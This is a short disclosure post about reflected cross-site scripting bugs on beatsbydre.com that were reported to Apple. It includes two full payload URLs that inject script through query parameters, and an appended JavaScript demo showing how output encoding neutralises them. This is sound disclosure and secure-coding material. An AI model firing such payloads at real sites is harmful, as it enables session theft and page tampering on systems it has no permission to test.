POC: Cross Site Scripting In BeatsByDre (By Apple)




In 2014 Apple acquired Beats. Just after the acquisition I thought of testing it, and I ended up finding multiple XSS issues in their main domain, http://beatsbydre.com.


So what was next, other than reporting the bug?

The vulnerable links were like the ones below:


http://www.beatsbydre.com/earphones/tour/red/900-00101-01.html?maxLimitError=--></SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(34, 120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>



http://www.beatsbydre.com/headphones/mixr/beats-mixr.html?bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm&icid="><img src=1 onerror=prompt(document.domain);>//
Simple vectors were used...
At first Apple refused to address the vulnerability.





But later on they accepted the report. I think there was a drunken dev on the other end... Well, they accepted it and fixed it.
As per Apple's cheap policy, only Hall of Fame was offered as a reward.
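
The two links in the post target different HTML contexts: the first closes a comment, a script block and both quote styles, the second closes a double-quoted attribute. As an added example (not code from the original post or from the site), the sketch below echoes both parameters through two hypothetical templates and shows the context-specific output encoding that keeps them inert; the templates, `QUERIES` and all function names are assumptions.

```javascript
// Added example, not the site's code. The templates are assumptions about how a
// page might echo a query parameter; the query strings come from the post's links.
const QUERIES = {
  maxLimitError: `maxLimitError=--></SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(34, 120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>`,
  icid: `bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm&icid="><img src=1 onerror=prompt(document.domain);>//`,
};
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encoder for HTML text and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Encoder for a JS string literal in an inline <script>: JSON quoting handles
// quotes and backslashes; \uXXXX keeps < > & away from the HTML parser.
function escapeForScript(value) {
  return JSON.stringify(String(value)).replace(/[<>&]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hypothetical templates: "naive" echoes the raw value, "encoded" matches the context.
const TEMPLATES = {
  attribute: {
    naive: (v) => `<input type="hidden" name="p" value="${v}">`,
    encoded: (v) => `<input type="hidden" name="p" value="${escapeHtml(v)}">`,
  },
  script: {
    naive: (v) => `<script>var p = "${v}";</script>`,
    encoded: (v) => `<script>var p = ${escapeForScript(v)};</script>`,
  },
};

// Crude demo check (not a scanner): '<' characters the parameter added to the markup.
function injectedAngles(render, value) {
  const count = (s) => (s.match(/</g) || []).length;
  return count(render(value)) - count(render(''));
}

// Renders one parameter from the post through every template, naive and encoded.
function audit(param) {
  const value = new URLSearchParams(QUERIES[param]).get(param) || '';
  const result = {};
  for (const [context, t] of Object.entries(TEMPLATES)) {
    result[context] = { naive: injectedAngles(t.naive, value), encoded: injectedAngles(t.encoded, value) };
  }
  return result;
}

console.log(JSON.stringify({ maxLimitError: audit('maxLimitError'), icid: audit('icid') }));
```

A non-zero `naive` count means the parameter introduced its own tags into the page; the `encoded` count stays at zero because each encoder neutralises the characters that matter in its own context.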
